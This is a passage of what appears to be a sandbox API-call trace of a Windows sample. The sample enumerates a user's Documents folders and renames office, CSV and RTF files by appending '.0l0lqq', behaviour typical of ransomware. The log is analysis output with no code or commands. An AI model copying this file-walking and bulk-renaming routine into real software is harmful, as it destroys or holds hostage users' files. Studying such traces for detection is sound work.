"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\msaytmf2ymxw3d92t.pptx.0l0lqq")) returned 1 [0255.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NyqimoSd7l319bg3F.docx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NyqimoSd7l319bg3F.docx", lpFilePart=0x0) returned 0x3e [0255.614] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NyqimoSd7l319bg3F.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nyqimosd7l319bg3f.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NyqimoSd7l319bg3F.docx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nyqimosd7l319bg3f.docx.0l0lqq")) returned 1 [0255.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RB7vKe4dGF-QVWZ3.xls", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RB7vKe4dGF-QVWZ3.xls", lpFilePart=0x0) returned 0x3c [0255.631] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RB7vKe4dGF-QVWZ3.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rb7vke4dgf-qvwz3.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RB7vKe4dGF-QVWZ3.xls.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rb7vke4dgf-qvwz3.xls.0l0lqq")) returned 1 [0255.646] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UNiICeYoMbvR-uhvCAQg.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uniiceyombvr-uhvcaqg.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UNiICeYoMbvR-uhvCAQg.pptx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uniiceyombvr-uhvcaqg.pptx.0l0lqq")) returned 1 [0255.660] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ys1suZFVNZW7SmZSMrC1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ys1suzfvnzw7smzsmrc1.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ys1suZFVNZW7SmZSMrC1.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ys1suzfvnzw7smzsmrc1.xlsx.0l0lqq")) returned 1 [0255.669] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_sXODdA_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_sxodda_.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_sXODdA_.docx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_sxodda_.docx.0l0lqq")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14540ff0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xb8b09c80, ftLastAccessTime.dwHighDateTime=0x1d5e008, ftLastWriteTime.dwLowDateTime=0xb8b09c80, ftLastWriteTime.dwHighDateTime=0x1d5e008, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e566ad0, ftCreationTime.dwHighDateTime=0x1d5e76c, ftLastAccessTime.dwLowDateTime=0xa1f7efe0, ftLastAccessTime.dwHighDateTime=0x1d5dcf0, ftLastWriteTime.dwLowDateTime=0xa1f7efe0, ftLastWriteTime.dwHighDateTime=0x1d5dcf0, nFileSizeHigh=0x0, nFileSizeLow=0x20ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Q1PC.ppt", cAlternateFileName="")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998dc010, ftCreationTime.dwHighDateTime=0x1d5e42e, ftLastAccessTime.dwLowDateTime=0x96945100, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x96945100, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1 MmEbxkGqY3oG2SgD", cAlternateFileName="1MMEBX~1")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2bb5f80, ftCreationTime.dwHighDateTime=0x1d5db46, ftLastAccessTime.dwLowDateTime=0x9bc146b0, ftLastAccessTime.dwHighDateTime=0x1d5e643, ftLastWriteTime.dwLowDateTime=0x9bc146b0, ftLastWriteTime.dwHighDateTime=0x1d5e643, nFileSizeHigh=0x0, nFileSizeLow=0x1532, dwReserved0=0x0, dwReserved1=0x0, cFileName="VPkhSGjkrb_tTMX-5zG.odt", cAlternateFileName="VPKHSG~1.ODT")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4735c0, ftCreationTime.dwHighDateTime=0x1d5e107, ftLastAccessTime.dwLowDateTime=0x9051d430, ftLastAccessTime.dwHighDateTime=0x1d5db0c, ftLastWriteTime.dwLowDateTime=0x9051d430, ftLastWriteTime.dwHighDateTime=0x1d5db0c, nFileSizeHigh=0x0, nFileSizeLow=0x143c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="WU KcSr.csv", cAlternateFileName="WUKCSR~1.CSV")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4735c0, ftCreationTime.dwHighDateTime=0x1d5e107, ftLastAccessTime.dwLowDateTime=0x9051d430, ftLastAccessTime.dwHighDateTime=0x1d5db0c, ftLastWriteTime.dwLowDateTime=0x9051d430, ftLastWriteTime.dwHighDateTime=0x1d5db0c, nFileSizeHigh=0x0, nFileSizeLow=0x143c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="WU KcSr.csv", cAlternateFileName="WUKCSR~1.CSV")) returned 0 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14540ff0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xb8b09c80, ftLastAccessTime.dwHighDateTime=0x1d5e008, ftLastWriteTime.dwLowDateTime=0xb8b09c80, ftLastWriteTime.dwHighDateTime=0x1d5e008, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e566ad0, ftCreationTime.dwHighDateTime=0x1d5e76c, ftLastAccessTime.dwLowDateTime=0xa1f7efe0, ftLastAccessTime.dwHighDateTime=0x1d5dcf0, ftLastWriteTime.dwLowDateTime=0xa1f7efe0, ftLastWriteTime.dwHighDateTime=0x1d5dcf0, nFileSizeHigh=0x0, nFileSizeLow=0x20ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Q1PC.ppt", cAlternateFileName="")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998dc010, ftCreationTime.dwHighDateTime=0x1d5e42e, ftLastAccessTime.dwLowDateTime=0x96945100, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x96945100, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1 MmEbxkGqY3oG2SgD", cAlternateFileName="1MMEBX~1")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2bb5f80, ftCreationTime.dwHighDateTime=0x1d5db46, ftLastAccessTime.dwLowDateTime=0x9bc146b0, ftLastAccessTime.dwHighDateTime=0x1d5e643, ftLastWriteTime.dwLowDateTime=0x9bc146b0, ftLastWriteTime.dwHighDateTime=0x1d5e643, nFileSizeHigh=0x0, nFileSizeLow=0x1532, dwReserved0=0x0, dwReserved1=0x0, cFileName="VPkhSGjkrb_tTMX-5zG.odt", cAlternateFileName="VPKHSG~1.ODT")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4735c0, ftCreationTime.dwHighDateTime=0x1d5e107, ftLastAccessTime.dwLowDateTime=0x9051d430, ftLastAccessTime.dwHighDateTime=0x1d5db0c, ftLastWriteTime.dwLowDateTime=0x9051d430, ftLastWriteTime.dwHighDateTime=0x1d5db0c, nFileSizeHigh=0x0, nFileSizeLow=0x143c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="WU KcSr.csv", cAlternateFileName="WUKCSR~1.CSV")) returned 1 [0255.671] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.672] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\-Q1PC.ppt", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\-Q1PC.ppt", lpFilePart=0x0) returned 0x40 [0255.676] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\-Q1PC.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\-q1pc.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\-Q1PC.ppt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\-q1pc.ppt.0l0lqq")) returned 1 [0255.681] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\VPkhSGjkrb_tTMX-5zG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\vpkhsgjkrb_ttmx-5zg.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\VPkhSGjkrb_tTMX-5zG.odt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\vpkhsgjkrb_ttmx-5zg.odt.0l0lqq")) returned 1 [0255.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\WU KcSr.csv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\WU KcSr.csv", lpFilePart=0x0) returned 0x42 [0255.690] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\WU KcSr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\wu kcsr.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\WU KcSr.csv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\wu kcsr.csv.0l0lqq")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998dc010, ftCreationTime.dwHighDateTime=0x1d5e42e, ftLastAccessTime.dwLowDateTime=0x96945100, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x96945100, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fccda10, ftCreationTime.dwHighDateTime=0x1d5dee7, ftLastAccessTime.dwLowDateTime=0x987611f0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0x987611f0, ftLastWriteTime.dwHighDateTime=0x1d5e122, nFileSizeHigh=0x0, nFileSizeLow=0x2e49, dwReserved0=0x0, dwReserved1=0x0, cFileName="eREigofsBf.rtf", cAlternateFileName="EREIGO~1.RTF")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4de8d0, ftCreationTime.dwHighDateTime=0x1d5e161, ftLastAccessTime.dwLowDateTime=0x2460130, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x2460130, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RrBVkffygJ", cAlternateFileName="RRBVKF~1")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4be6db0, ftCreationTime.dwHighDateTime=0x1d5e6d9, ftLastAccessTime.dwLowDateTime=0x18008e80, ftLastAccessTime.dwHighDateTime=0x1d5e184, ftLastWriteTime.dwLowDateTime=0x18008e80, ftLastWriteTime.dwHighDateTime=0x1d5e184, nFileSizeHigh=0x0, nFileSizeLow=0xcf53, dwReserved0=0x0, dwReserved1=0x0, cFileName="TpGSs8iWFUEw.pptx", cAlternateFileName="TPGSS8~1.PPT")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd7f584b0, ftCreationTime.dwHighDateTime=0x1d5e7bb, ftLastAccessTime.dwLowDateTime=0xb408e990, ftLastAccessTime.dwHighDateTime=0x1d5dd9b, ftLastWriteTime.dwLowDateTime=0xb408e990, ftLastWriteTime.dwHighDateTime=0x1d5dd9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="veDu1mKJbJZcFL1zr490", cAlternateFileName="VEDU1M~1")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998dc010, ftCreationTime.dwHighDateTime=0x1d5e42e, ftLastAccessTime.dwLowDateTime=0x96945100, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x96945100, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fccda10, ftCreationTime.dwHighDateTime=0x1d5dee7, ftLastAccessTime.dwLowDateTime=0x987611f0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0x987611f0, ftLastWriteTime.dwHighDateTime=0x1d5e122, nFileSizeHigh=0x0, nFileSizeLow=0x2e49, dwReserved0=0x0, dwReserved1=0x0, cFileName="eREigofsBf.rtf", cAlternateFileName="EREIGO~1.RTF")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4de8d0, ftCreationTime.dwHighDateTime=0x1d5e161, ftLastAccessTime.dwLowDateTime=0x2460130, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x2460130, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RrBVkffygJ", cAlternateFileName="RRBVKF~1")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4be6db0, ftCreationTime.dwHighDateTime=0x1d5e6d9, ftLastAccessTime.dwLowDateTime=0x18008e80, ftLastAccessTime.dwHighDateTime=0x1d5e184, ftLastWriteTime.dwLowDateTime=0x18008e80, ftLastWriteTime.dwHighDateTime=0x1d5e184, nFileSizeHigh=0x0, nFileSizeLow=0xcf53, dwReserved0=0x0, dwReserved1=0x0, cFileName="TpGSs8iWFUEw.pptx", cAlternateFileName="TPGSS8~1.PPT")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd7f584b0, ftCreationTime.dwHighDateTime=0x1d5e7bb, ftLastAccessTime.dwLowDateTime=0xb408e990, ftLastAccessTime.dwHighDateTime=0x1d5dd9b, ftLastWriteTime.dwLowDateTime=0xb408e990, ftLastWriteTime.dwHighDateTime=0x1d5dd9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="veDu1mKJbJZcFL1zr490", cAlternateFileName="VEDU1M~1")) returned 1 [0255.694] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd7f584b0, ftCreationTime.dwHighDateTime=0x1d5e7bb, ftLastAccessTime.dwLowDateTime=0xb408e990, ftLastAccessTime.dwHighDateTime=0x1d5dd9b, ftLastWriteTime.dwLowDateTime=0xb408e990, ftLastWriteTime.dwHighDateTime=0x1d5dd9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="veDu1mKJbJZcFL1zr490", cAlternateFileName="VEDU1M~1")) returned 0 [0255.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\eREigofsBf.rtf", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\eREigofsBf.rtf", lpFilePart=0x0) returned 0x58 [0255.698] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\eREigofsBf.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\ereigofsbf.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\eREigofsBf.rtf.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\ereigofsbf.rtf.0l0lqq")) returned 1 [0255.706] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\TpGSs8iWFUEw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\tpgss8iwfuew.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\TpGSs8iWFUEw.pptx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\tpgss8iwfuew.pptx.0l0lqq")) returned 1 [0255.707] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd7f584b0, ftCreationTime.dwHighDateTime=0x1d5e7bb, ftLastAccessTime.dwLowDateTime=0xb408e990, ftLastAccessTime.dwHighDateTime=0x1d5dd9b, ftLastWriteTime.dwLowDateTime=0xb408e990, ftLastWriteTime.dwHighDateTime=0x1d5dd9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.707] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a999860, ftCreationTime.dwHighDateTime=0x1d5de68, ftLastAccessTime.dwLowDateTime=0x6d89d830, ftLastAccessTime.dwHighDateTime=0x1d5da8a, ftLastWriteTime.dwLowDateTime=0x6d89d830, ftLastWriteTime.dwHighDateTime=0x1d5da8a, nFileSizeHigh=0x0, nFileSizeLow=0xc796, dwReserved0=0x0, dwReserved1=0x0, cFileName="bfppTG8V.csv", cAlternateFileName="")) returned 1 [0255.707] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e3bfb30, ftCreationTime.dwHighDateTime=0x1d5d896, ftLastAccessTime.dwLowDateTime=0xd209ca90, ftLastAccessTime.dwHighDateTime=0x1d5e020, ftLastWriteTime.dwLowDateTime=0xd209ca90, ftLastWriteTime.dwHighDateTime=0x1d5e020, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MFw4s0sXs5Hzn02y", cAlternateFileName="MFW4S0~1")) returned 1 [0255.707] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31acb4b0, ftCreationTime.dwHighDateTime=0x1d5de11, ftLastAccessTime.dwLowDateTime=0x6f4cf280, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x6f4cf280, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x124cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="ozutj.doc", cAlternateFileName="")) returned 1 [0255.707] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31acb4b0, ftCreationTime.dwHighDateTime=0x1d5de11, ftLastAccessTime.dwLowDateTime=0x6f4cf280, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x6f4cf280, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x124cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="ozutj.doc", cAlternateFileName="")) returned 0 [0255.707] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd7f584b0, ftCreationTime.dwHighDateTime=0x1d5e7bb, ftLastAccessTime.dwLowDateTime=0xb408e990, ftLastAccessTime.dwHighDateTime=0x1d5dd9b, ftLastWriteTime.dwLowDateTime=0xb408e990, ftLastWriteTime.dwHighDateTime=0x1d5dd9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.708] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a999860, ftCreationTime.dwHighDateTime=0x1d5de68, ftLastAccessTime.dwLowDateTime=0x6d89d830, ftLastAccessTime.dwHighDateTime=0x1d5da8a, ftLastWriteTime.dwLowDateTime=0x6d89d830, ftLastWriteTime.dwHighDateTime=0x1d5da8a, nFileSizeHigh=0x0, nFileSizeLow=0xc796, dwReserved0=0x0, dwReserved1=0x0, cFileName="bfppTG8V.csv", cAlternateFileName="")) returned 1 [0255.708] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e3bfb30, ftCreationTime.dwHighDateTime=0x1d5d896, ftLastAccessTime.dwLowDateTime=0xd209ca90, ftLastAccessTime.dwHighDateTime=0x1d5e020, ftLastWriteTime.dwLowDateTime=0xd209ca90, ftLastWriteTime.dwHighDateTime=0x1d5e020, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MFw4s0sXs5Hzn02y", cAlternateFileName="MFW4S0~1")) returned 1 [0255.708] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31acb4b0, ftCreationTime.dwHighDateTime=0x1d5de11, ftLastAccessTime.dwLowDateTime=0x6f4cf280, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x6f4cf280, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x124cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="ozutj.doc", cAlternateFileName="")) returned 1 [0255.714] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\bfppTG8V.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\bfpptg8v.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\bfppTG8V.csv.0l0lqq" (normalized: 